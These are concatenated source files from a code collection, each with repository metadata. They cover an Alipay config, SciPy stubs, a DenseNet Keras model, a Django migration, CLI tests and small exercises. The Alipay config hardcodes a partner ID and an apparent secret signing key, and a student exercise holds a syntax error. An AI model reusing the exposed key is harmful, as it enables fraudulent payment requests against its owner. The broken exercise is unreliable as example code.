13d00496340bf494c42e637092864c02cd223882 | 8030404af9a6b2555387a49a3e43a47be7a26470 | /peggy/lib/alipaylib/alipayConfig.py | 2799153644f19ca6690396e6c9260dcb2097eff1 | []
| no_license | mebusw/tianjinsports-server | d5de7aae1a25affdd3c91c78e5a82b0d4c10220f | 3402ac634fc92b5ccdf049f530e6b7b8b604aac1 | refs/heads/master | 2016-09-06T21:32:40.096629 | 2015-03-14T13:20:24 | 2015-03-14T13:20:24 | 32,121,712 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 502 | py | import os
partner = "2088711061370024"
key = "j5f5nc0lev9wch24t2cotwdvqkwexgww"
seller_mail = "[email protected]"
if 'SERVER_SOFTWARE' in os.environ:
notify_url = "http://1.peggy.sinaapp.com/peggy/paid_notify_wap"
return_url = "http://1.peggy.sinaapp.com/peggy/paid_wap"
show_url = "http://1.peggy.sinaapp.com/peggy"
else:
notify_url = "http://127.0.0.1:8000/peggy/paid_notify_wap"
return_url = "http://127.0.0.1:8000/peggy/paid_wap"
show_url = "http://127.0.0.1:8000/peggy"
| [
"[email protected]"
]
| |
f05b968e39febf01d27debcf0bed250e13309c9a | 8898273f9811fab29eb5621734bafcdf204d8229 | /scipy-stubs/integrate/quadrature.pyi | 21ea590c9993068c72b5be57697a1ef607670d6b | []
| no_license | tyrion/scipy-stubs | 628ad6321a7e1502683a2b55a759777508ab4b67 | bf49a91313523c4f635bc3e5d14444c1361caf64 | refs/heads/master | 2020-05-30T21:59:43.001510 | 2019-06-03T10:30:54 | 2019-06-03T10:30:54 | 189,984,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 970 | pyi | # Stubs for scipy.integrate.quadrature (Python 3.6)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from numpy import trapz as trapz
from typing import Any, Optional
class AccuracyWarning(Warning): ...
def fixed_quad(func: Any, a: Any, b: Any, args: Any = ..., n: int = ...): ...
def quadrature(func: Any, a: Any, b: Any, args: Any = ..., tol: float = ..., rtol: float = ..., maxiter: int = ..., vec_func: bool = ..., miniter: int = ...): ...
def cumtrapz(y: Any, x: Optional[Any] = ..., dx: float = ..., axis: int = ..., initial: Optional[Any] = ...): ...
def simps(y: Any, x: Optional[Any] = ..., dx: int = ..., axis: int = ..., even: str = ...): ...
def romb(y: Any, dx: float = ..., axis: int = ..., show: bool = ...): ...
def romberg(function: Any, a: Any, b: Any, args: Any = ..., tol: float = ..., rtol: float = ..., show: bool = ..., divmax: int = ..., vec_func: bool = ...): ...
def newton_cotes(rn: Any, equal: int = ...): ...
| [
"[email protected]"
]
| |
188b926a0273d9407218185aa3016d3f02c1eb88 | 55b57d64ec547869835334318f3059fbb507558c | /Fred2/Data/pssms/smm/mat/A_32_07_9.py | 9d57732d1c3384a786473ec66600efe950cc1551 | [
"BSD-3-Clause"
]
| permissive | FRED-2/Fred2 | 9845f6678d4011cb746c7a5a6f283eea68077a02 | b3e54c8c4ed12b780b61f74672e9667245a7bb78 | refs/heads/master | 2021-07-12T05:05:54.515427 | 2020-05-25T06:56:25 | 2020-05-25T06:56:25 | 16,275,425 | 42 | 35 | null | 2021-07-07T12:05:11 | 2014-01-27T10:08:11 | Python | UTF-8 | Python | false | false | 2,145 | py | A_32_07_9 = {0: {'A': 0.197, 'C': 0.0, 'E': -0.11, 'D': 0.0, 'G': -0.053, 'F': 0.087, 'I': 0.122, 'H': -0.115, 'K': -0.109, 'M': 0.153, 'L': 0.056, 'N': 0.0, 'Q': -0.004, 'P': 0.0, 'S': -0.278, 'R': -0.213, 'T': -0.08, 'W': 0.169, 'V': 0.0, 'Y': 0.177}, 1: {'A': 0.177, 'C': 0.0, 'E': 0.245, 'D': 0.0, 'G': -0.006, 'F': -0.133, 'I': -0.025, 'H': 0.0, 'K': 0.0, 'M': 0.031, 'L': -0.032, 'N': 0.0, 'Q': -0.236, 'P': 0.039, 'S': -0.022, 'R': 0.167, 'T': 0.083, 'W': 0.0, 'V': -0.011, 'Y': -0.276}, 2: {'A': 0.158, 'C': 0.0, 'E': 0.0, 'D': 0.0, 'G': 0.0, 'F': -0.04, 'I': 0.081, 'H': -0.15, 'K': 0.058, 'M': -0.145, 'L': -0.108, 'N': 0.001, 'Q': 0.0, 'P': 0.021, 'S': -0.15, 'R': 0.038, 'T': -0.136, 'W': 0.24, 'V': 0.098, 'Y': 0.032}, 3: {'A': 0.0, 'C': 0.0, 'E': -0.001, 'D': -0.0, 'G': -0.0, 'F': -0.0, 'I': 0.0, 'H': -0.0, 'K': 0.0, 'M': -0.0, 'L': 0.0, 'N': -0.0, 'Q': -0.0, 'P': -0.001, 'S': 0.0, 'R': 0.0, 'T': 0.001, 'W': -0.0, 'V': 0.0, 'Y': -0.0}, 4: {'A': 0.002, 'C': 0.0, 'E': -0.0, 'D': 0.0, 'G': -0.002, 'F': 0.001, 'I': -0.001, 'H': -0.001, 'K': 0.0, 'M': -0.001, 'L': 0.001, 'N': -0.0, 'Q': -0.0, 'P': 0.001, 'S': 0.001, 'R': 0.001, 'T': -0.001, 'W': -0.001, 'V': 0.0, 'Y': -0.001}, 5: {'A': 0.059, 'C': -0.077, 'E': 0.0, 'D': -0.06, 'G': -0.123, 'F': 0.09, 'I': 0.075, 'H': 0.317, 'K': -0.107, 'M': 0.0, 'L': 0.071, 'N': -0.058, 'Q': -0.079, 'P': 0.019, 'S': -0.002, 'R': 0.086, 'T': -0.012, 'W': -0.165, 'V': -0.036, 'Y': 0.002}, 6: {'A': 0.0, 'C': 0.0, 'E': 0.0, 'D': 0.0, 'G': 0.0, 'F': -0.0, 'I': 0.0, 'H': 0.0, 'K': 0.0, 'M': 0.0, 'L': -0.0, 'N': -0.0, 'Q': -0.0, 'P': -0.0, 'S': -0.0, 'R': 0.0, 'T': 0.0, 'W': -0.0, 'V': -0.0, 'Y': -0.0}, 7: {'A': 0.133, 'C': 0.0, 'E': 0.109, 'D': 0.0, 'G': -0.133, 'F': 0.002, 'I': 0.0, 'H': -0.0, 'K': 0.032, 'M': 0.12, 'L': -0.108, 'N': 0.015, 'Q': -0.064, 'P': 0.036, 'S': -0.019, 'R': 0.0, 'T': -0.186, 'W': 0.0, 'V': -0.006, 'Y': 0.071}, 8: {'A': 0.0, 'C': 0.0, 'E': 0.0, 'D': 0.0, 'G': 0.0, 'F': -0.01, 'I': -0.01, 'H': 0.0, 'K': 0.021, 'M': -0.006, 'L': 0.036, 'N': 0.0, 'Q': 0.0, 'P': 0.0, 'S': 0.0, 'R': 0.008, 'T': 0.0, 'W': -0.032, 'V': -0.001, 'Y': -0.005}, -1: {'con': 1.37905}} | [
"[email protected]"
]
| |
b32a67ea872da39fa07c33669690cc804b81d4ba | 5c80c1c3a24399db5d7c2a259a3e2d18dcbe79a2 | /TensorFlow/computer_vision/densenet_keras/models/densenet.py | 0b3007fe678d074e264f54166cd76a0aededbb19 | [
"MIT",
"Apache-2.0"
]
| permissive | maxchung2001/Model-References | b2f26cec3bcfc912f50379e47fcff7cb60ea96d2 | bc8da16830c1c35e5d1458ba2e46df8726e10f29 | refs/heads/master | 2023-04-12T16:37:27.103316 | 2021-04-22T07:00:01 | 2021-04-22T07:00:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,199 | py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""DenseNet models for Keras.
Reference paper:
- [Densely Connected Convolutional Networks]
(https://arxiv.org/abs/1608.06993) (CVPR 2017 Best Paper Award)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.python.keras import backend
from tensorflow.python.keras import layers
from tensorflow.python.keras.applications import imagenet_utils
from tensorflow.python.keras.engine import training
from tensorflow.python.keras.utils import data_utils
from tensorflow.python.keras.utils import layer_utils
from tensorflow.python.util.tf_export import keras_export
BASE_WEIGTHS_PATH = ('https://storage.googleapis.com/tensorflow/'
'keras-applications/densenet/')
DENSENET121_WEIGHT_PATH = (
BASE_WEIGTHS_PATH + 'densenet121_weights_tf_dim_ordering_tf_kernels.h5')
DENSENET121_WEIGHT_PATH_NO_TOP = (
BASE_WEIGTHS_PATH +
'densenet121_weights_tf_dim_ordering_tf_kernels_notop.h5')
DENSENET169_WEIGHT_PATH = (
BASE_WEIGTHS_PATH + 'densenet169_weights_tf_dim_ordering_tf_kernels.h5')
DENSENET169_WEIGHT_PATH_NO_TOP = (
BASE_WEIGTHS_PATH +
'densenet169_weights_tf_dim_ordering_tf_kernels_notop.h5')
DENSENET201_WEIGHT_PATH = (
BASE_WEIGTHS_PATH + 'densenet201_weights_tf_dim_ordering_tf_kernels.h5')
DENSENET201_WEIGHT_PATH_NO_TOP = (
BASE_WEIGTHS_PATH +
'densenet201_weights_tf_dim_ordering_tf_kernels_notop.h5')
def dense_block(x, blocks, name):
"""A dense block.
Arguments:
x: input tensor.
blocks: integer, the number of building blocks.
name: string, block label.
Returns:
Output tensor for the block.
"""
for i in range(blocks):
x = conv_block(x, 32, name=name + '_block' + str(i + 1))
return x
def transition_block(x, reduction, name):
"""A transition block.
Arguments:
x: input tensor.
reduction: float, compression rate at transition layers.
name: string, block label.
Returns:
output tensor for the block.
"""
bn_axis = 3 if backend.image_data_format() == 'channels_last' else 1
x = layers.BatchNormalization(
axis=bn_axis, epsilon=1.001e-5, name=name + '_bn')(
x)
x = layers.Activation('relu', name=name + '_relu')(x)
x = layers.Conv2D(
int(backend.int_shape(x)[bn_axis] * reduction),
1,
use_bias=False,
name=name + '_conv')(
x)
x = layers.AveragePooling2D(2, strides=2, name=name + '_pool')(x)
return x
def conv_block(x, growth_rate, name):
"""A building block for a dense block.
Arguments:
x: input tensor.
growth_rate: float, growth rate at dense layers.
name: string, block label.
Returns:
Output tensor for the block.
"""
bn_axis = 3 if backend.image_data_format() == 'channels_last' else 1
x1 = layers.BatchNormalization(
axis=bn_axis, epsilon=1.001e-5, name=name + '_0_bn')(
x)
x1 = layers.Activation('relu', name=name + '_0_relu')(x1)
x1 = layers.Conv2D(
4 * growth_rate, 1, use_bias=False, name=name + '_1_conv')(
x1)
x1 = layers.BatchNormalization(
axis=bn_axis, epsilon=1.001e-5, name=name + '_1_bn')(
x1)
x1 = layers.Activation('relu', name=name + '_1_relu')(x1)
x1 = layers.Conv2D(
growth_rate, 3, padding='same', use_bias=False, name=name + '_2_conv')(
x1)
x = layers.Concatenate(axis=bn_axis, name=name + '_concat')([x, x1])
return x
def DenseNet(
batch_size,
blocks,
include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000,
classifier_activation='softmax',
):
"""Instantiates the DenseNet architecture.
Optionally loads weights pre-trained on ImageNet.
Note that the data format convention used by the model is
the one specified in your Keras config at `~/.keras/keras.json`.
Caution: Be sure to properly pre-process your inputs to the application.
Please see `applications.densenet.preprocess_input` for an example.
Arguments:
blocks: numbers of building blocks for the four dense layers.
include_top: whether to include the fully-connected
layer at the top of the network.
weights: one of `None` (random initialization),
'imagenet' (pre-training on ImageNet),
or the path to the weights file to be loaded.
input_tensor: optional Keras tensor
(i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: optional shape tuple, only to be specified
if `include_top` is False (otherwise the input shape
has to be `(224, 224, 3)` (with `'channels_last'` data format)
or `(3, 224, 224)` (with `'channels_first'` data format).
It should have exactly 3 inputs channels,
and width and height should be no smaller than 32.
E.g. `(200, 200, 3)` would be one valid value.
pooling: optional pooling mode for feature extraction
when `include_top` is `False`.
- `None` means that the output of the model will be
the 4D tensor output of the
last convolutional block.
- `avg` means that global average pooling
will be applied to the output of the
last convolutional block, and thus
the output of the model will be a 2D tensor.
- `max` means that global max pooling will
be applied.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
classifier_activation: A `str` or callable. The activation function to use
on the "top" layer. Ignored unless `include_top=True`. Set
`classifier_activation=None` to return the logits of the "top" layer.
Returns:
A `keras.Model` instance.
Raises:
ValueError: in case of invalid argument for `weights`,
or invalid input shape.
ValueError: if `classifier_activation` is not `softmax` or `None` when
using a pretrained top layer.
"""
if not (weights in {'imagenet', None} or os.path.exists(weights)):
raise ValueError('The `weights` argument should be either '
'`None` (random initialization), `imagenet` '
'(pre-training on ImageNet), '
'or the path to the weights file to be loaded.')
if weights == 'imagenet' and include_top and classes != 1000:
raise ValueError('If using `weights` as `"imagenet"` with `include_top`'
' as true, `classes` should be 1000')
# Determine proper input shape
input_shape = imagenet_utils.obtain_input_shape(
input_shape,
default_size=224,
min_size=32,
data_format=backend.image_data_format(),
require_flatten=include_top,
weights=weights)
if input_tensor is None:
img_input = layers.Input(shape=input_shape, batch_size=batch_size)
else:
if not backend.is_keras_tensor(input_tensor):
img_input = layers.Input(tensor=input_tensor, shape=input_shape, batch_size=batch_size)
else:
img_input = input_tensor
raise NotImplemented("Unsupported flow")
bn_axis = 3 if backend.image_data_format() == 'channels_last' else 1
x = layers.ZeroPadding2D(padding=((3, 3), (3, 3)))(img_input)
x = layers.Conv2D(64, 7, strides=2, use_bias=False, name='conv1/conv')(x)
x = layers.BatchNormalization(
axis=bn_axis, epsilon=1.001e-5, name='conv1/bn')(
x)
x = layers.Activation('relu', name='conv1/relu')(x)
x = layers.ZeroPadding2D(padding=((1, 1), (1, 1)))(x)
x = layers.MaxPooling2D(3, strides=2, name='pool1')(x)
x = dense_block(x, blocks[0], name='conv2')
x = transition_block(x, 0.5, name='pool2')
x = dense_block(x, blocks[1], name='conv3')
x = transition_block(x, 0.5, name='pool3')
x = dense_block(x, blocks[2], name='conv4')
x = transition_block(x, 0.5, name='pool4')
x = dense_block(x, blocks[3], name='conv5')
x = layers.BatchNormalization(axis=bn_axis, epsilon=1.001e-5, name='bn')(x)
x = layers.Activation('relu', name='relu')(x)
if include_top:
x = layers.GlobalAveragePooling2D(name='avg_pool')(x)
imagenet_utils.validate_activation(classifier_activation, weights)
x = layers.Dense(classes, activation=classifier_activation,
name='predictions')(x)
else:
if pooling == 'avg':
x = layers.GlobalAveragePooling2D(name='avg_pool')(x)
elif pooling == 'max':
x = layers.GlobalMaxPooling2D(name='max_pool')(x)
# Ensure that the model takes into account
# any potential predecessors of `input_tensor`.
if input_tensor is not None:
inputs = layer_utils.get_source_inputs(input_tensor)
else:
inputs = img_input
# Create model.
if blocks == [6, 12, 24, 16]:
model = training.Model(inputs, x, name='densenet121')
elif blocks == [6, 12, 32, 32]:
model = training.Model(inputs, x, name='densenet169')
elif blocks == [6, 12, 48, 32]:
model = training.Model(inputs, x, name='densenet201')
else:
model = training.Model(inputs, x, name='densenet')
# Load weights.
if weights == 'imagenet':
if include_top:
if blocks == [6, 12, 24, 16]:
weights_path = data_utils.get_file(
'densenet121_weights_tf_dim_ordering_tf_kernels.h5',
DENSENET121_WEIGHT_PATH,
cache_subdir='models',
file_hash='9d60b8095a5708f2dcce2bca79d332c7')
elif blocks == [6, 12, 32, 32]:
weights_path = data_utils.get_file(
'densenet169_weights_tf_dim_ordering_tf_kernels.h5',
DENSENET169_WEIGHT_PATH,
cache_subdir='models',
file_hash='d699b8f76981ab1b30698df4c175e90b')
elif blocks == [6, 12, 48, 32]:
weights_path = data_utils.get_file(
'densenet201_weights_tf_dim_ordering_tf_kernels.h5',
DENSENET201_WEIGHT_PATH,
cache_subdir='models',
file_hash='1ceb130c1ea1b78c3bf6114dbdfd8807')
else:
if blocks == [6, 12, 24, 16]:
weights_path = data_utils.get_file(
'densenet121_weights_tf_dim_ordering_tf_kernels_notop.h5',
DENSENET121_WEIGHT_PATH_NO_TOP,
cache_subdir='models',
file_hash='30ee3e1110167f948a6b9946edeeb738')
elif blocks == [6, 12, 32, 32]:
weights_path = data_utils.get_file(
'densenet169_weights_tf_dim_ordering_tf_kernels_notop.h5',
DENSENET169_WEIGHT_PATH_NO_TOP,
cache_subdir='models',
file_hash='b8c4d4c20dd625c148057b9ff1c1176b')
elif blocks == [6, 12, 48, 32]:
weights_path = data_utils.get_file(
'densenet201_weights_tf_dim_ordering_tf_kernels_notop.h5',
DENSENET201_WEIGHT_PATH_NO_TOP,
cache_subdir='models',
file_hash='c13680b51ded0fb44dff2d8f86ac8bb1')
model.load_weights(weights_path)
elif weights is not None:
model.load_weights(weights)
return model
@keras_export('keras.applications.densenet.DenseNet121',
'keras.applications.DenseNet121')
def DenseNet121(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000):
"""Instantiates the Densenet121 architecture."""
return DenseNet([6, 12, 24, 16], include_top, weights, input_tensor,
input_shape, pooling, classes)
@keras_export('keras.applications.densenet.DenseNet169',
'keras.applications.DenseNet169')
def DenseNet169(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000):
"""Instantiates the Densenet169 architecture."""
return DenseNet([6, 12, 32, 32], include_top, weights, input_tensor,
input_shape, pooling, classes)
@keras_export('keras.applications.densenet.DenseNet201',
'keras.applications.DenseNet201')
def DenseNet201(include_top=True,
weights='imagenet',
input_tensor=None,
input_shape=None,
pooling=None,
classes=1000):
"""Instantiates the Densenet201 architecture."""
return DenseNet([6, 12, 48, 32], include_top, weights, input_tensor,
input_shape, pooling, classes)
@keras_export('keras.applications.densenet.preprocess_input')
def preprocess_input(x, data_format=None):
"""Preprocesses a numpy array encoding a batch of images.
Arguments
x: A 4D numpy array consists of RGB values within [0, 255].
Returns
Preprocessed array.
Raises
ValueError: In case of unknown `data_format` argument.
"""
return imagenet_utils.preprocess_input(
x, data_format=data_format, mode='torch')
@keras_export('keras.applications.densenet.decode_predictions')
def decode_predictions(preds, top=5):
"""Decodes the prediction result from the model.
Arguments
preds: Numpy tensor encoding a batch of predictions.
top: Integer, how many top-guesses to return.
Returns
A list of lists of top class prediction tuples
`(class_name, class_description, score)`.
One list of tuples per sample in batch input.
Raises
ValueError: In case of invalid shape of the `preds` array (must be 2D).
"""
return imagenet_utils.decode_predictions(preds, top=top)
preprocess_input.__doc__ = imagenet_utils.PREPROCESS_INPUT_DOC.format(
mode='', ret=imagenet_utils.PREPROCESS_INPUT_RET_DOC_TORCH)
decode_predictions.__doc__ = imagenet_utils.decode_predictions.__doc__
DOC = """
Optionally loads weights pre-trained on ImageNet.
Note that the data format convention used by the model is
the one specified in your Keras config at `~/.keras/keras.json`.
Arguments:
include_top: whether to include the fully-connected
layer at the top of the network.
weights: one of `None` (random initialization),
'imagenet' (pre-training on ImageNet),
or the path to the weights file to be loaded.
input_tensor: optional Keras tensor (i.e. output of `layers.Input()`)
to use as image input for the model.
input_shape: optional shape tuple, only to be specified
if `include_top` is False (otherwise the input shape
has to be `(224, 224, 3)` (with `'channels_last'` data format)
or `(3, 224, 224)` (with `'channels_first'` data format).
It should have exactly 3 inputs channels,
and width and height should be no smaller than 32.
E.g. `(200, 200, 3)` would be one valid value.
pooling: Optional pooling mode for feature extraction
when `include_top` is `False`.
- `None` means that the output of the model will be
the 4D tensor output of the
last convolutional block.
- `avg` means that global average pooling
will be applied to the output of the
last convolutional block, and thus
the output of the model will be a 2D tensor.
- `max` means that global max pooling will
be applied.
classes: optional number of classes to classify images
into, only to be specified if `include_top` is True, and
if no `weights` argument is specified.
Returns:
A Keras model instance.
"""
setattr(DenseNet121, '__doc__', DenseNet121.__doc__ + DOC)
setattr(DenseNet169, '__doc__', DenseNet169.__doc__ + DOC)
setattr(DenseNet201, '__doc__', DenseNet201.__doc__ + DOC)
| [
"[email protected]"
]
| |
eae6d7708433536367bc9b2cb96ce49711facb5d | 2ebc85f7f34a459d69ff412f956b43ab2472590f | /backend/tasker_business/migrations/0001_initial.py | 95053422e99e4ae9ece3cd837ff4b1db4b389baf | []
| no_license | crowdbotics-apps/mobile-car-wash-23107 | 4ea678f1c88fe4c96eb498535e4fb14e60110ae0 | 96b057e5989a8b5dbb1267f93c0a34f57a72d636 | refs/heads/master | 2023-01-19T21:07:11.993601 | 2020-12-01T12:55:21 | 2020-12-01T12:55:21 | 317,537,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,617 | py | # Generated by Django 2.2.17 on 2020-12-01 12:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('task_category', '0001_initial'),
('task_profile', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Timeslot',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('start_time', models.TimeField()),
('end_time', models.TimeField()),
],
),
migrations.CreateModel(
name='TaskerSkill',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('rate', models.FloatField()),
('description', models.TextField()),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='taskerskill_category', to='task_category.Category')),
('subcategory', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='taskerskill_subcategory', to='task_category.Subcategory')),
('tasker', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='taskerskill_tasker', to='task_profile.TaskerProfile')),
],
),
migrations.CreateModel(
name='TaskerAvailability',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tasker', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='taskeravailability_tasker', to='task_profile.TaskerProfile')),
('timeslots', models.ManyToManyField(related_name='taskeravailability_timeslots', to='tasker_business.Timeslot')),
],
),
migrations.CreateModel(
name='BusinessPhoto',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('photo', models.URLField()),
('description', models.TextField()),
('tasker', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='businessphoto_tasker', to='task_profile.TaskerProfile')),
],
),
]
| [
"[email protected]"
]
| |
b32b76f682558b542d37e0757152e22391f98198 | e2f5479f73bdfb9cd93a2fd7c615da369a43a499 | /tests/lastfm/commands/test_cmd_add.py | eb79cd38db6d075e48444f318b17fe6ab264ae91 | [
"MIT"
]
| permissive | tefra/pytuber | 8bdb837d0912c9bacab0bff1e0196bfdba67cb62 | a7c5d6252584dc0abee946e707f496cecaebf1bb | refs/heads/master | 2022-05-19T21:48:02.129812 | 2022-05-08T10:08:40 | 2022-05-08T10:10:24 | 161,838,438 | 10 | 6 | MIT | 2022-05-08T09:45:24 | 2018-12-14T20:44:26 | Python | UTF-8 | Python | false | false | 6,159 | py | from unittest import mock
from pytuber.cli import cli
from pytuber.core.models import PlaylistManager
from pytuber.core.models import Provider
from pytuber.lastfm.models import PlaylistType
from pytuber.lastfm.models import UserPlaylistType
from pytuber.lastfm.params import ArtistParamType
from pytuber.lastfm.params import CountryParamType
from pytuber.lastfm.params import TagParamType
from pytuber.lastfm.params import UserParamType
from tests.utils import CommandTestCase
from tests.utils import PlaylistFixture
class CommandAddTests(CommandTestCase):
@mock.patch("pytuber.lastfm.commands.cmd_add.fetch_tracks")
@mock.patch.object(UserParamType, "convert")
@mock.patch.object(PlaylistManager, "set")
def test_user_playlist(self, create_playlist, convert, fetch_tracks):
convert.return_value = "bbb"
create_playlist.return_value = PlaylistFixture.one()
result = self.runner.invoke(
cli,
["add", "lastfm", "user-playlist"],
input="\n".join(("aaa", "2", "50", "My Favorite ")),
catch_exceptions=False,
)
expected_output = (
"Last.fm username: aaa",
"Playlist Types",
"[1] User Loved Tracks",
"[2] User Top Tracks",
"[3] User Recent Tracks",
"[4] User Friends Recent Tracks",
"Select a playlist type 1-4: 2",
"Maximum tracks [50]: 50",
"Title: My Favorite ",
"Added playlist: id_a!",
)
self.assertEqual(0, result.exit_code)
self.assertOutput(expected_output, result.output)
create_playlist.assert_called_once_with(
{
"type": UserPlaylistType.USER_TOP_TRACKS,
"provider": Provider.lastfm,
"arguments": {"limit": 50, "username": "bbb"},
"title": "My Favorite",
}
)
fetch_tracks.assert_called_once_with("id_a")
@mock.patch("pytuber.lastfm.commands.cmd_add.fetch_tracks")
@mock.patch.object(PlaylistManager, "set")
def test_chart_playlist(self, create_playlist, fetch_tracks):
create_playlist.return_value = PlaylistFixture.one()
result = self.runner.invoke(
cli, ["add", "lastfm", "chart-playlist"], input="50\n "
)
expected_output = (
"Maximum tracks [50]: 50",
"Title: ",
"Added playlist: id_a!",
)
self.assertEqual(0, result.exit_code)
self.assertOutput(expected_output, result.output)
create_playlist.assert_called_once_with(
{
"type": PlaylistType.CHART,
"provider": Provider.lastfm,
"arguments": {"limit": 50},
"title": "",
}
)
fetch_tracks.assert_called_once_with("id_a")
@mock.patch("pytuber.lastfm.commands.cmd_add.fetch_tracks")
@mock.patch.object(CountryParamType, "convert")
@mock.patch.object(PlaylistManager, "set")
def test_country_playlist(self, create_playlist, country_param_type, fetch_tracks):
country_param_type.return_value = "greece"
create_playlist.return_value = PlaylistFixture.one()
result = self.runner.invoke(
cli, ["add", "lastfm", "country-playlist"], input=b"gr\n50\n "
)
expected_output = (
"Country Code: gr",
"Maximum tracks [50]: 50",
"Title: ",
"Added playlist: id_a!",
)
self.assertEqual(0, result.exit_code)
self.assertOutput(expected_output, result.output)
create_playlist.assert_called_once_with(
{
"type": PlaylistType.COUNTRY,
"provider": Provider.lastfm,
"arguments": {"limit": 50, "country": "greece"},
"title": "",
}
)
fetch_tracks.assert_called_once_with("id_a")
@mock.patch("pytuber.lastfm.commands.cmd_add.fetch_tracks")
@mock.patch.object(TagParamType, "convert")
@mock.patch.object(PlaylistManager, "set")
def test_tag_playlist(self, create_playlist, convert, fetch_tracks):
convert.return_value = "rock"
create_playlist.return_value = PlaylistFixture.one(synced=111)
result = self.runner.invoke(
cli, ["add", "lastfm", "tag-playlist"], input="rock\n50\n "
)
expected_output = (
"Tag: rock",
"Maximum tracks [50]: 50",
"Title: ",
"Updated playlist: id_a!",
)
self.assertEqual(0, result.exit_code)
self.assertOutput(expected_output, result.output)
create_playlist.assert_called_once_with(
{
"type": PlaylistType.TAG,
"provider": Provider.lastfm,
"arguments": {"limit": 50, "tag": "rock"},
"title": "",
}
)
fetch_tracks.assert_called_once_with("id_a")
@mock.patch("pytuber.lastfm.commands.cmd_add.fetch_tracks")
@mock.patch.object(ArtistParamType, "convert")
@mock.patch.object(PlaylistManager, "set")
def test_artist_playlist(self, create_playlist, artist_param, fetch_tracks):
artist_param.return_value = "Queen"
create_playlist.return_value = PlaylistFixture.one()
result = self.runner.invoke(
cli,
["add", "lastfm", "artist-playlist"],
input="Queen\n50\nQueen....",
catch_exceptions=False,
)
expected_output = (
"Artist: Queen",
"Maximum tracks [50]: 50",
"Title: Queen....",
"Added playlist: id_a!",
)
self.assertEqual(0, result.exit_code)
self.assertOutput(expected_output, result.output)
create_playlist.assert_called_once_with(
{
"type": PlaylistType.ARTIST,
"provider": Provider.lastfm,
"arguments": {"limit": 50, "artist": "Queen"},
"title": "Queen....",
}
)
fetch_tracks.assert_called_once_with("id_a")
| [
"[email protected]"
]
| |
5df5e0dd5c4926e279b6ba9b730b3394612747dc | 3cdb4faf34d8375d6aee08bcc523adadcb0c46e2 | /web/env/lib/python3.6/site-packages/user_agents/__init__.py | b8dc2453a93f1e47e2146c07f97dc0191a628b39 | [
"MIT",
"GPL-3.0-only"
]
| permissive | rizwansoaib/face-attendence | bc185d4de627ce5adab1cda7da466cb7a5fddcbe | 59300441b52d32f3ecb5095085ef9d448aef63af | refs/heads/master | 2020-04-25T23:47:47.303642 | 2019-09-12T14:26:17 | 2019-09-12T14:26:17 | 173,157,284 | 45 | 12 | MIT | 2020-02-11T23:47:55 | 2019-02-28T17:33:14 | Python | UTF-8 | Python | false | false | 48 | py | VERSION = (2, 0, 0)
from .parsers import parse
| [
"[email protected]"
]
| |
3c03f32e5eb27a8eed60265897afc1267e87e8c7 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/133/usersdata/219/41408/submittedfiles/al15.py | a09e1d37170fb844e616c106b8bacdfa9a11aef3 | []
| no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | # -*- coding: utf-8 -*-
i=1
for i in range(1000,9999,1):
a1=i%100
a2=i/100
if((a1+a2)*(a1+a2)==i):
print('%d/n' i)
| [
"[email protected]"
]
| |
7818dfe58848eb01336f7b5651924a5ed6c63634 | de01cb554c2292b0fbb79b4d5413a2f6414ea472 | /algorithms/Medium/375.guess-number-higher-or-lower-ii.py | b6799751f60aa606ef7ea7280f4aafd950549035 | []
| no_license | h4hany/yeet-the-leet | 98292017eadd3dde98a079aafcd7648aa98701b4 | 563d779467ef5a7cc85cbe954eeaf3c1f5463313 | refs/heads/master | 2022-12-10T08:35:39.830260 | 2020-09-02T23:12:15 | 2020-09-02T23:12:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,154 | py | #
# @lc app=leetcode id=375 lang=python3
#
# [375] Guess Number Higher or Lower II
#
# https://leetcode.com/problems/guess-number-higher-or-lower-ii/description/
#
# algorithms
# Medium (40.27%)
# Total Accepted: 64.6K
# Total Submissions: 160.4K
# Testcase Example: '1'
#
# We are playing the Guess Game. The game is as follows:
#
